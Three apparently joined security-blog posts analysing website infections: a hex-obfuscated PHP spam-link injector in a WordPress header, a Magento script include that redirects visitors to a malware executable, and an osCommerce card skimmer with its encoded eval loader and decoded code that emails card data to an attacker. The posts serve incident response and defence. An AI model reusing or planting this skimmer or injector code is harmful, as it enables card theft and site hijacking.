Author: Ahmad Azizan

Hex’ing the CSS Style Attribute for Black Hat...

Dealing with Black Hat SEO injections on our daily operation is always fun and challenging at the same time. One day, we may work with heavily obfuscated codes but on another, it can be just spam in plain-text waiting to be removed.

In the last few months, we’ve seen and reported on different techniques used by attackers— ranging from using DOM-based JavaScript obfuscation to just plain CSS style manipulation. All of these attacks share the same goal, which is to make their spamblocks invisible to human visitors but accessible to be indexed by search engine crawlers t.

On a recent case, we found yet another simple but very interesting Black Hat SEO injection on a compromised website. The following malware was added on the theme’s header.php of a WordPress site:

<?php
print '<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">';
for ($i1 = 0; $i1 < 18; $i1++) {
  $link1 = mt_rand(100, 9999999);
  echo "<a href=\"http://compromisedwebsite.com/wp-news.php?t=" .$link1. "\">viagra" .$link1. "</a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-stories.php?t=" .$link1. "\">casino" .$link1. t;/a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-max.php?t=" .$link1. "\">drugs" .$link1. "</a><br>\r\n";
  $i1++;
} ; 
print '</div>';
?>

The PHP code will then generate an HTML code to the site header as below;

<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">
<a href="http://compromisedwebsite.com/wp-news.php?t=3743996">viagra3743996</a><br>
<a href="http:// compromisedwebsite.com/wp-stories.php?t=3743996">casino3743996</a><br>
...
<a href="http:// compromisedwebsite.com/wp-stories.php?t=8106883">casino8106883</a><br>
<a href="http:// compromisedwebsite.com/wp-max.php?t=8106883">drugs8106883</a><br>
</div>

The code makes use of hex characters to obfuscate a CSS style attribute in order to hide the spam blocks. Converting those characters to ASCII text, we can see it is just a normal display:none, a style attribute used to hide elements within the div tag on the web browser.

$ echo "\64\69\73\70\6c\61\79" | xxd -r -p
display
$ echo "\6e\6f\6e\65" | xxd -r -p
none

As a site owner, it’s very important to have mechanisms to detect, prevent, and remediate issues in place before search engine crawlers can fetch the hacked version of our site. The sooner we act on the problem, the lesser the effects on our SEO and Search Engine Results Page (SERP) entries. Use our SiteCheck Scanner to regularly scan your site for unwanted spam, and let us know if want to get it cleaned.

May 16, 2019 by Ahmad Azizan

When Online Shopping leads to Malware download

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to having a strange redirection when users visited the site. Without further ado, we started investigating the issue on this site.


The site loaded pretty slow on our end, which didn’t look right. There was something holding the site back. After further checking, we found a JavaScript include with suspicious URL on the page source as below:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that this is a conditional URL where on the first check, we could see a JavaScript code, but on the next check the code wouldn’t display anymore. Luckily we saved the JavaScript code firsthand and it redirected the user to download an executable file named ‘plugin.exe’ from a dropbox shared link as below: 

function process() { window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1"; } window.onerror = process; process()

We were able to download the ‘plugin.exe’ file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal gives 34/59 detection ratio for this file which shows pretty clearly that it is a malware file.

Since we confirmed on the malicious component, we went back to the site infrastructure to find its source. It wasn’t long before we figured out that the JavaScript include had been stored inside Magento database on core_config_data table as shown on screenshot below;

Right after the piece of code was removed from the database, the site started loading way faster than before. Luckily the site hasn’t been flagged nor blacklisted by Google, so we could skip the blacklist removal request procedure for now.

Searching a bit on Google for this similar threat, there are just a few infections related to this one for now, but all of them are related to Magento websites.

If you look into our previous labs notes related to Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, blackhat SEO, or even malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Aug 28, 2017 by Ahmad Azizan

Credit Card Stealer on osCommerce

We regularly detect malware that targets payment modules on compromised ecommerce websites, mainly on Magento.

Recently we’ve stumbled upon the same threat on osCommerce. The malicious code was found inside ./catalog/checkout_confirmation.php and used obfuscation as below:

…eval(gzinflate(str_rot13(base64_decode('Dc9UsqJAAADQ43x/sRAQFHdJ5ByUBoTNRxMaVg0i0dPPvBu8ZYXdqfrWGGhjLkIZ/JRK5mJE5lBEnn5Dd7qA3zbFyNbzI47VvBPpQ…wSmhNUk33O2C+uFKeOUAGdb8UyETzPEp1nvg7hIgQB5355jGg9LQuJGxB31rYoBLc7LHDv0hwC8L3ocO4KlLduNn6ntts7EmJ1z1lZuZ4tFt4U12paYTRI+dIKnefP7+/vn38='))));…

When decoded, the code appeared to be a credit card stealer. The code sends a copy of stolen credit card information to attacker’s email and saves it inside an image file for backup purposes. This happens every time customers submit their payment details during the checkout process:

$recipient = "<attacker’s-email-address>@gmail.com";$subject = "www.<compromised-site>.com";$mailheaders = "From: www.<compromised-site>.com <sales@ www.<compromised-site>.com >";$address4 = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');$ip = getenv("REMOTE_ADDR");…$message .= "Name on card: ".$_POST['cc_owner']." CC: ".$_POST['cc_number']." Exp: ".$_POST['cc_expires_month']         ."/".$_POST['cc_expires_year']." CVV2: ".$_POST['cc_ccv']."n";…mail($recipient, $subject, $message, $mailheaders);$f = fopen('/<path to public directory>/catalog/images/oscommerce2.gif','a');fputs($f, $message . "n"); fclose($f);

If you're using osCommerce as ecommerce solution, always check your core files, especially ./catalog/checkout_confirmation.php for any modified content, and do regular scans. As always, if you need a professional service for your osCommerce website, you can count on our Website AntiVirus service.

Apr 28, 2016 by Ahmad Azizan